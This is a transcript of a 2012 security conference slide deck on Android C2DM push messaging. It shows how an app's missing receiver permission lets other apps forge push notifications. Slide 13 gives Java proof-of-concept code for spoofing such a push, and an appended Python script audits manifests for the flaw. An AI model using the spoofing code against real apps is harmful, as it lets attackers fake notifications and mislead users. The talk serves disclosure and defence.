
AC2DM For Security

102 views

Published on

Talks about Google's Cloud to Device (C2D at the time this was written in 2012 - now known as Google Cloud Messaging) technology, and ways it can be misconfigured.

Published in: Technology


  1. AC2DM for Security
  2. Android C2DM Overview
     • Push notification for Android
     • Rides on Gtalk (XMPP)
     • Messages limited to 1024 bytes
     • Account limited to 200,000 messages per day
  3. A confusing process (image taken from http://developer.cisco.com/web/cius-developer/blogroll/-/blogs/android-s-c2dm)
  4. Client Registration
  5. App Registration
  6. Message Send
  7. Parts of a Message
     Required:
     • Registration ID – sent by client
     • Collapse key – used to avoid flooding
     • Auth token – header from client login auth
     Optional:
     • Data – payload
     • Delay while idle – flag
  8. Manifest Components

     ```xml
     <permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE"
         android:protectionLevel="signature" />
     <!-- Required to receive C2D messages -->
     <uses-permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE" />
     <!-- Required to register and receive registration results -->
     <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE" />
     <!-- Internet required -->
     <uses-permission android:name="android.permission.INTERNET" />
     <application>
       <!-- Android C2DM registration receiver -->
       <receiver android:name=".c2dRegReceiver"
           android:permission="com.google.android.c2dm.permission.SEND">
         <intent-filter>
           <action android:name="com.google.android.c2dm.intent.REGISTRATION" />
           <category android:name="com.intrepidusgroup.c2dm" />
         </intent-filter>
       </receiver>
       <!-- Android C2DM message receiver -->
       <receiver android:name=".c2dMsgReceiver"
           android:permission="com.google.android.c2dm.permission.SEND">
         <intent-filter>
           <action android:name="com.google.android.c2dm.intent.RECEIVE" />
           <category android:name="com.intrepidusgroup.c2dm" />
         </intent-filter>
       </receiver>
     </application>
     ```
  9. Real World

     ```xml
     <permission android:name="com.app.mobile.permission.C2D_MESSAGE"
         android:protectionLevel="signature" />
     <uses-permission android:name="com.app.mobile.permission.C2D_MESSAGE" />
     ```

     So far so good…
  10. Real World

     ```xml
     <receiver android:name=".notifications.PushMsgReceiver"
         android:process=":notifications">
       <intent-filter>
         <action android:name="com.google.android.c2dm.intent.RECEIVE" />
         <category android:name="com.ebay.mobile" />
       </intent-filter>
       <intent-filter>
         <action android:name="com.google.android.c2dm.intent.REGISTRATION" />
         <category android:name="com.ebay.mobile" />
       </intent-filter>
     </receiver>

     <!-- Only C2DM servers can send messages for the app.
          If permission is not set - any other app can generate it -->
     <receiver android:name=".C2DMReceiver"
         android:permission="com.google.android.c2dm.permission.SEND">
     ```
  11. So… ZOMG!!
  12. Example Push (seen in logcat)

     ```text
     I/PushService( 3990): onHandleIntent: action=3, intent data=Bundle[{ itm=37524594341, push_action=3, title=message received from: jross, collapse_key=jrossig01, sound=m2mmsghdr.caf, evt=M2MMSGHDR, from=appid@gmail.com, usr=jross }]
     ```
  13. Spoof (no cloud required)

     ```java
     // declare the Intent
     final Intent sendC2DM = new Intent("com.google.android.c2dm.intent.RECEIVE");
     // set this as category com.app.mobile to match the intent-filter
     sendC2DM.addCategory("com.app.mobile");
     // add the expected data elements
     sendC2DM.putExtra("itm", "37524594341");
     sendC2DM.putExtra("push_action", "3");
     sendC2DM.putExtra("title", "message received from: C2DSpoofer");
     sendC2DM.putExtra("sound", "m2mmsghdr.caf");
     sendC2DM.putExtra("evt", "M2MMSGHDR");
     sendC2DM.putExtra("usr", send2usr);  // send2usr: target user name, defined elsewhere in the demo app
     // randString.genString is the presenter's own helper (not shown on the slide)
     String collapse_key = randString.genString(rng, chars, 4);
     sendC2DM.putExtra("collapse_key", collapse_key);
     // send the message to the on-device push notification receiver
     sendBroadcast(sendC2DM);
     ```
  14. What Happened?
     • App received a “C2D” message from another application installed on the device.
     • Because the permission wasn’t set correctly, it accepted the message as though it came from Google.
     • App displayed message notification, with the “malicious” payload intact.
  15. Other Things We’ve Noticed
     • Messages that come in may not be accurately received by the activity they are sent to (see: demo).
     • If you have multiple devices, or multiple users on a single device, things may get tricky.
  16. Questions? Contact: jason.ross@intrepidusgroup.com
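As an added defensive check (not part of the talk), the following Python script audits an AndroidManifest.xml for the misconfiguration shown on slides 10 and 14: a receiver that filters on the C2DM RECEIVE or REGISTRATION actions without `android:permission="com.google.android.c2dm.permission.SEND"`, so that any app on the device can broadcast a fake push. The sample manifest, its package name `com.example.c2dmdemo` and the function name are constructed for this demonstration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
C2DM_ACTIONS = {"com.google.android.c2dm.intent.RECEIVE",
                "com.google.android.c2dm.intent.REGISTRATION"}
C2DM_SEND_PERMISSION = "com.google.android.c2dm.permission.SEND"

def find_unprotected_c2dm_receivers(manifest_xml):
    """Return the android:name of every <receiver> that filters on a C2DM
    action but is not guarded by c2dm.permission.SEND, either on the
    receiver itself or inherited from <application android:permission>."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for app in root.iter("application"):
        app_perm = app.get(ANDROID_NS + "permission")
        for receiver in app.iter("receiver"):
            actions = {a.get(ANDROID_NS + "name")
                       for f in receiver.findall("intent-filter")
                       for a in f.findall("action")}
            if not actions & C2DM_ACTIONS:
                continue  # not a C2DM receiver, nothing to check
            perm = receiver.get(ANDROID_NS + "permission") or app_perm
            if perm != C2DM_SEND_PERMISSION:
                findings.append(receiver.get(ANDROID_NS + "name"))
    return findings

# Constructed sample manifest (hypothetical package name): the first receiver
# mirrors the unprotected "Real World" receiver, the second is guarded.
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.c2dmdemo">
  <application>
    <receiver android:name=".notifications.PushMsgReceiver">
      <intent-filter>
        <action android:name="com.google.android.c2dm.intent.RECEIVE" />
        <category android:name="com.example.c2dmdemo" />
      </intent-filter>
    </receiver>
    <receiver android:name=".C2DMReceiver"
        android:permission="com.google.android.c2dm.permission.SEND">
      <intent-filter>
        <action android:name="com.google.android.c2dm.intent.RECEIVE" />
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

if __name__ == "__main__":
    print(find_unprotected_c2dm_receivers(SAMPLE_MANIFEST))
```

Point it at a manifest pulled from a decoded APK; an empty list means every C2DM receiver is restricted to senders holding the Google SEND permission.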
